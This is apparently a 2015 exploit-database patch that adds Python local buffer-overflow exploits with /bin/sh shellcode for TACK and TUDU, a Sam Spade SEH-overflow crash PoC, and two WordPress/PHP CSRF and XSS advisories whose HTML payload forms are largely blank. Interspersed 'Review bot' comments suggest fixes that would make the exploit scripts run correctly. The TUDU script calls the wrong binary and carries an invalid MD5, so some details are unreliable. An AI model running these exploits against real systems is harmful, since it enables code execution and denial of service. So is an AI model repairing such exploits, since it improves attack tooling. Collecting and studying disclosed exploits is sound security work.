From 4ab205abc3ddc2e2a1f5f40e472a292899fb00c9 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 13 Nov 2015 05:03:26 +0000
Subject: [PATCH] DB: 2015-11-13 5 new exploits
---
 files.csv | 5 +
 platforms/linux/local/38685.py | 48 ++++++++
 platforms/linux/local/38686.py | 48 ++++++++
 platforms/php/webapps/38648.txt | 48 ++++++++
 platforms/php/webapps/38684.txt | 189 ++++++++++++++++++++++++++++++++
 platforms/windows/dos/38687.py | 32 ++++++
 6 files changed, 370 insertions(+)
 create mode 100755 platforms/linux/local/38685.py
 create mode 100755 platforms/linux/local/38686.py
 create mode 100755 platforms/php/webapps/38648.txt
 create mode 100755 platforms/php/webapps/38684.txt
 create mode 100755 platforms/windows/dos/38687.py
diff --git a/files.csv b/files.csv
index a81b0f566..9532521ed 100755
--- a/files.csv
+++ b/files.csv
@@ -34921,6 +34921,7 @@ id,file,description,date,author,platform,type,port
 38641,platforms/multiple/webapps/38641.rb,"JSSE SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0
 38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0
 38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0
+38648,platforms/php/webapps/38648.txt,"WordPress My Calendar Plugin 2.4.10 - Multiple Vulnerabilities",2015-11-06,Mysticism,php,webapps,0
 38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library <= 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0
 38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash PoC",2015-11-07,"Luis Martínez",windows,dos,0
 38651,platforms/php/webapps/38651.txt,"eBay Magento CE <= 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / DoS)",2015-11-07,"Dawid Golunski",php,webapps,0
@@ -34941,6 +34942,7 @@ id,file,description,date,author,platform,type,port
 38667,platforms/windows/remote/38667.py,"ReadyMedia Remote Heap Buffer Overflow Vulnerability",2013-07-15,"Zachary Cutlip",windows,remote,0
 38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption Information Disclosure Vulnerability",2013-07-09,"Brad Antoniewicz",windows,local,0
 38669,platforms/multiple/remote/38669.txt,"MongoDB 'conn' Mongo Object Remote Code Execution Vulnerability",2013-06-04,"SCRT Security",multiple,remote,0
+38684,platforms/php/webapps/38684.txt,"R-Scripts Vacation Rental Script 7R - Multiple Vulnerabilities",2015-11-12,LiquidWorm,php,webapps,0
 38671,platforms/hardware/remote/38671.txt,"Barracuda CudaTel Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote,0
 38672,platforms/windows/local/38672.txt,"YardRadius Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0
 38673,platforms/php/webapps/38673.txt,"Collabtive Multiple Security Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0
@@ -34954,3 +34956,6 @@ id,file,description,date,author,platform,type,port
 38681,platforms/linux/local/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,local,0
 38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
 38683,platforms/php/webapps/38683.txt,"Jahia xCM /administration/ Multiple Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
+38685,platforms/linux/local/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
+38686,platforms/linux/local/38686.py,"TUDU 0.82 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
+38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0
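Review bot: The new 38684 row in the second hunk is placed between 38669 and 38671, while the third hunk appends 38685–38687 after 38683 at the end of the file; if files.csv is meant to stay sorted by id, as the surrounding rows suggest, 38684 belongs with those three additions rather than in the middle of the 386xx block. Tooling that diffs or merges this index by id will see the entry out of place, and a later merge of the same id range is more likely to conflict. Moving the row next to `+38685,platforms/linux/local/38685.py,...` keeps the ordering consistent with the rest of the file.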
diff --git a/platforms/linux/local/38685.py b/platforms/linux/local/38685.py
new file mode 100755
index 000000000..b13c68c99
--- /dev/null
+++ b/platforms/linux/local/38685.py
@@ -0,0 +1,48 @@
+# Exploit Author: Juan Sacco - http://www.exploitpack.com
+# Program: tack - Terminal action checker
+# Tested on: GNU/Linux - Kali Linux 2.0 x86
+#
+# Description: TACK v1.07 and prior is prone to a stack-based buffer overflow
+# vulnerability because the application fails to perform adequate
+# boundary-checks on user-supplied input.
+#
+# An attacker could exploit this issue to execute arbitrary code in the
+# context of the application. Failed exploit attempts will result in a
+# denial-of-service condition.
+#
+# Vendor homepage: *http://www.z nyx.com *
+# Kali Linux 2.0 package: pool/main/t/tack/tack_1.07-1_amd64.deb
+# MD5: 0fc1d2e9c374c1156b2b02186a9f8980
+
+import os,subprocess
+def run():
+ try:
+ print "# TACK v1.07 Stack-Based Overflow by Juan Sacco"
+ print "# It's Fuzzing time on unusable exploits"
+ print "# This exploit is for educational purposes only"
+ # Basic structure: JUNK + SHELLCODE + NOPS + EIP
+
+ junk = "\x41"*10
+ shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+ nops = "\x90"*3022
+ eip = "\x30\xd1\xff\xbf"
+ subprocess.call(["tack",' ', junk + shellcode + nops + eip])
+
+ except OSError as e:
+ if e.errno == os.errno.ENOENT:
+ print "TACK not found!"
+ else:
+ print "Error executing exploit"
+ raise
+
+def howtousage():
+ print "Sorry, something went wrong"
+ sys.exit(-1)
+
+if __name__ == '__main__':
+ try:
+ print "Exploit TACK 1.07 Local Overflow Exploit"
+ print "Author: Juan Sacco"
+ except IndexError:
+ howtousage()
+run()
diff --git a/platforms/linux/local/38686.py b/platforms/linux/local/38686.py
new file mode 100755
index 000000000..ce34c8bb4
--- /dev/null
+++ b/platforms/linux/local/38686.py
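Review bot: `howtousage()` calls `sys.exit(-1)` but the file only imports `os` and `subprocess`, so that path raises NameError instead of exiting; the same applies to 38686.py in the next hunk, which is a copy of this structure. Two further issues shared by both files: `os.errno` is not a documented attribute of `os` (it happens to resolve on Python 2 and is gone on 3.7+), so the ENOENT branch should use `import errno` and `if e.errno == errno.ENOENT:`; and the final `run()` sits at column 0 outside the `if __name__ == '__main__':` guard, so merely importing the module executes it. A minimal fix is `import errno, os, subprocess, sys` at the top, the errno comparison above, and indenting `run()` under the guard. The `except IndexError` around two print statements can never fire, so the `howtousage()` branch is dead as written.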
@@ -0,0 +1,48 @@
+# Exploit Author: Juan Sacco - http://www.exploitpack.com
+# Program: tudu - Command line hierarchical ToDo list
+# Tested on: GNU/Linux - Kali Linux 2.0 x86
+#
+# Description: TUDU v0.82 and prior is prone to a stack-based buffer overflow
+# vulnerability because the application fails to perform adequate
+# boundary-checks on user-supplied input.
+#
+# An attacker could exploit this issue to execute arbitrary code in the
+# context of the application. Failed exploit attempts will result in a
+# denial-of-service condition.
+#
+# Vendor homepage: http://www.cauterized.net/~meskio/tudu
+# Kali Linux 2.0 package: pool/main/t/tudu/tudu_0.8.2-1.deb
+# MD5: 1dc2s2e9c374c9876b2b02283a9f5243
+
+import os,subprocess
+def run():
+ try:
+ print "# TUDU v0.82 Stack-Based Overflow by Juan Sacco"
+ print "# It's Fuzzing time on unusable exploits"
+ print "# This exploit is for educational purposes only"
+ # Basic structure: JUNK + SHELLCODE + NOPS + EIP
+
+ junk = "\x41"*10
+ shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+ nops = "\x90"*124
+ eip = "\x60\xd3\xff\xbf"
+ subprocess.call(["tack",' ', junk + shellcode + nops + eip])
+
+ except OSError as e:
+ if e.errno == os.errno.ENOENT:
+ print "TUDU not found!"
+ else:
+ print "Error executing exploit"
+ raise
+
+def howtousage():
+ print "Sorry, something went wrong"
+ sys.exit(-1)
+
+if __name__ == '__main__':
+ try:
+ print "Exploit TUDU 0.82 Local Overflow Exploit"
+ print "Author: Juan Sacco"
+ except IndexError:
+ howtousage()
+run()
diff --git a/platforms/php/webapps/38648.txt b/platforms/php/webapps/38648.txt
new file mode 100755
index 000000000..0f88dc996
--- /dev/null
+++ b/platforms/php/webapps/38648.txt
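Review bot: The header metadata of this file cannot be used for triage as written: `# MD5: 1dc2s2e9c374c9876b2b02283a9f5243` contains a non-hex character, so it is not a real MD5 and nobody can match it against the package, and the package name `tudu_0.8.2-1.deb` does not agree with the `v0.82` in the title. The body also contradicts the header, since the program described and the not-found message say TUDU while the `subprocess.call` line invokes `tack`; a defender reading the advisory gets two different answers to "which package is affected". The header fields should be re-checked against the actual Kali package (hash and version string) and the program name made consistent throughout, with the MD5 replaced by the verified value or removed.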
@@ -0,0 +1,48 @@ +Exploit TItle: My Calendar 2.4.10 CSRF and XSS +Exploit Author : Mysticism (Ahn Sung Jun) +Date : 2015-11-06 +Vendor Homepage : http://wordpress.org/plugins/my-calendar +Software Link : https://downloads.wordpress.org/plugin/my-calendar.2.4.10.zip +Version : 2.4.10 +Tested On : kail linux Iceweasel + + +=================== +Vulnerable Code : my-calendar-categoris.php +if ( isset( $_POST['mode'] ) && $_POST['mode'] == 'add' ) { + $term = wp_insert_term( $_POST['category_name'], 'mc-event-category' ); + if ( ! is_wp_error( $term ) ) { + $term = $term['term_id']; + } else { + $term = false; + } + $add = array( + 'category_name' => $_POST['category_name'], + 'category_color' => $_POST['category_color'], + 'category_icon' => $_POST['category_icon'], + 'category_private' => ( ( isset( $_POST['category_private'] ) ) ? 1 : 0 ), + 'category_term' => $term + ); + } + + +POC (CSRF & XSS) + + + +
+ + + + + + + + + +
+ + + +Discovered By +Mysticism(Ahn Sung Jun) \ No newline at end of file diff --git a/platforms/php/webapps/38684.txt b/platforms/php/webapps/38684.txt new file mode 100755 index 000000000..c765645d2 --- /dev/null +++ b/platforms/php/webapps/38684.txt @@ -0,0 +1,189 @@ + +R-Scripts VRS 7R Multiple Stored XSS And CSRF Vulnerabilities + + +Vendor: R-Scripts +Product web page: http://www.r-scripts.com +Affected version: 7R + +Summary: PHP Vacation Rental Script is the best solution +for your vacation rentals online business. + +Desc: The application allows users to perform certain actions +via HTTP requests without performing any validity checks +to verify the requests. This can be exploited to perform +certain actions with administrative privileges if a logged-in +user visits a malicious web site. Stored cross-site scripting +vulnerabilitity was also discovered. The issue is triggered +when input passed via multiple POST parameters is not properly +sanitized before being returned to the user. This can be +exploited to execute arbitrary HTML and script code in a +user's browser session in context of an affected site. + +Tested on: Apache/2.2.29 + PHP/5.3.29 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2015-5274 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5274.php + + +01.10.2015 + +-- + + +CSRF Add Admin: +--------------- + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + +Privilege Escalation: +--------------------- + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + +
+ + + + +Stored XSS: +----------- + + + +
+ + + + + + + + + + + + + + + + + + +
+ + + + +Stored XSS: +----------- + + + +
+ + + + + + + + + + + + + + + + + + + + +
+ + + +Stored XSS: +----------- + + + +
+ + + + + + + + + + + + +
+
+
diff --git a/platforms/windows/dos/38687.py b/platforms/windows/dos/38687.py
new file mode 100755
index 000000000..b0e77b765
--- /dev/null
+++ b/platforms/windows/dos/38687.py
@@ -0,0 +1,32 @@
+#!/usr/bin/env python
+# Exploit Title : Sam Spade 1.14 S-Lang Command Field SEH Overflow Crash PoC
+# Discovery by : Nipun Jaswal
+# Email : mail@nipunjaswal.info
+# Discovery Date : 12/11/2015
+# Vendor Homepage : http://samspade.org
+# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
+# Tested Version : 1.14
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS : Windows XP Professional SP2 x86 es
+# Crash Point : Go to Tools > S-Lang Command> Enter the contents of 'sam_spade_slang_dos.txt' > OK , Note: Do Not Remove the round bracket
+##########################################################################################
+# -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+# And the Stack
+#00FBFE80 41414141 AAAA
+#00FBFE84 41414141 AAAA
+#00FBFE88 42424242 BBBB Pointer to next SEH record
+#00FBFE8C 43434343 CCCC SE handler
+
+# After the execution of POC, the SEH chain looks like this:
+#Address SE handler
+#00FBFE88 43434343
+#42424242 *** CORRUPT ENTRY ***
+
+f = open("sam_spade_slang_dos.txt", "w")
+Junk_a = "A"*528
+nseh= "B" * 4
+seh= "C" *4
+
+f.write(Junk_a+nseh+seh)
+f.close()
\ No newline at end of file
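Review bot: The file is opened with a bare `open()` and closed manually, so if `f.write` raises the handle is left open and the partially written file is not cleaned up; the idiomatic form is `with open("sam_spade_slang_dos.txt", "w") as f:` followed by the indented `f.write(Junk_a+nseh+seh)`, which also drops the explicit `f.close()`. The output name is fixed and opened in `"w"` mode, so running the script silently overwrites any existing file of that name in the working directory; `"x"` mode would refuse instead. The `# Crash Point` line carries the reproduction steps and belongs in a module docstring rather than a comment so it shows up in `help()`.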